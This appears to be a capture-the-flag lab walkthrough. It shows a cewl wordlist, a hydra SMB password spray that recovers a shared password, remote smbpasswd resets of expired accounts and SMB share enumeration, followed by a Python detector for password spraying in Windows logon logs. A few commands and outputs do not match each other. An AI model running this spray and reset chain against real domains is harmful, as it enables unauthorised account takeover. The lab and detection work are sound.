5 spray passwd
# smb doesn't connect
# ldap needs auth
# time to cewl
$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers -w pass.txt
ssh - nothing.
$ hydra -L users -P pass.txt smb://10.10.10.193
[DATA] attacking smb://10.10.10.193:445/
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: tlavel password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bnielson Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: bnielson password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: bhult password: Fabricorp01
# trying smbclient
$ smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
$ smbclient -L 10.10.10.193 -U bnielson
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
$ smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
# we need to change password using smbpasswd in kali
$ smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password: kashz
Retype new SMB password: kashz
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.
# there's a password policy that we need to follow
# changing to Fabricorp02
$ smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password: Fabricorp01
New SMB password: Fabricorp05
Retype new SMB password: Fabricorp05
Password changed for user tlavel
$ smbclient -U tlavel -L //10.10.10.193
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE
# trying other users
# fails for bhult also
| bnielson works
$ smbclient -U bnielson%Fabricorp05 -L //10.10.10.193
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
HP-MFT01        Printer   HP-MFT01
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
print$          Disk      Printer Drivers
SYSVOL          Disk      Logon server share
# after every 1-2 min, password is reset and need to change to a different one as using same gives error
| machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/HP-MFT01
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/SYSVOL
Try "help" to get a list of possible commands.
smb: \> dir
.                   D       0  Fri May 29 16:29:09 2020
..                  D       0  Fri May 29 16:29:09 2020
fabricorp.local     Dr      0  Fri May 29 16:29:09 2020
smb: \fabricorp.local\> dir
.                   D       0  Fri May 29 16:35:39 2020
..                  D       0  Fri May 29 16:35:39 2020
DfsrPrivate         DHSr    0  Fri May 29 16:35:39 2020
Policies            D       0  Fri May 29 16:29:19 2020
scripts             D       0  Fri May 29 16:29:09 2020
# cannot view DfsrPrivate
# scripts is empty
# Policies contains policy-related information
# nothing in smb
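
Seen from the domain controller, the hydra run above is a burst of failed logons (event 4625) from one source across many accounts, and NT_STATUS_PASSWORD_MUST_CHANGE is a failure code that still confirms the guessed password was right. The detection logic below is an added example, not part of the original notes; the CSV field layout, the 192.0.2.x addresses, the user_a/user_b/user_c accounts and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Event 4625 sub-status values meaning the password was CORRECT but logon was refused.
PASSWORD_CORRECT = {
    "0xc0000224": "must change at next logon",  # NT_STATUS_PASSWORD_MUST_CHANGE
    "0xc0000071": "password expired",           # NT_STATUS_PASSWORD_EXPIRED
}

# Constructed sample export (assumed layout): timestamp,source_ip,account,sub_status
# 0xC000006A = wrong password. The second source is one user mistyping, not a spray.
SAMPLE = """\
2020-06-01T10:00:01,192.0.2.10,tlavel,0xC0000224
2020-06-01T10:00:02,192.0.2.10,user_a,0xC000006A
2020-06-01T10:00:03,192.0.2.10,bnielson,0xC0000224
2020-06-01T10:00:04,192.0.2.10,user_b,0xC000006A
2020-06-01T10:00:05,192.0.2.10,bhult,0xC0000224
2020-06-01T10:03:00,192.0.2.77,user_c,0xC000006A
2020-06-01T10:03:20,192.0.2.77,user_c,0xC000006A
"""

def parse(text):
    for line in text.strip().splitlines():
        ts, src, user, sub = (f.strip() for f in line.split(","))
        yield datetime.fromisoformat(ts), src, user.lower(), sub.lower()

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Flag sources whose failures span >= min_accounts accounts within window."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1  # slide the window forward
            in_window = evs[start:end + 1]
            accounts = {user for _, _, user, _ in in_window}
            if len(accounts) >= min_accounts:
                hit = findings.setdefault(src, {"accounts": set(), "exposed": {}})
                hit["accounts"] |= accounts
                # These "failures" identify accounts whose password was guessed.
                for _, _, user, sub in in_window:
                    if sub in PASSWORD_CORRECT:
                        hit["exposed"][user] = PASSWORD_CORRECT[sub]
    return findings

if __name__ == "__main__":
    print(detect_spray(parse(SAMPLE)))
```

Accounts listed under `exposed` need a forced reset by an administrator, since the remote password change shown above lets whoever guessed the expired password set a new one.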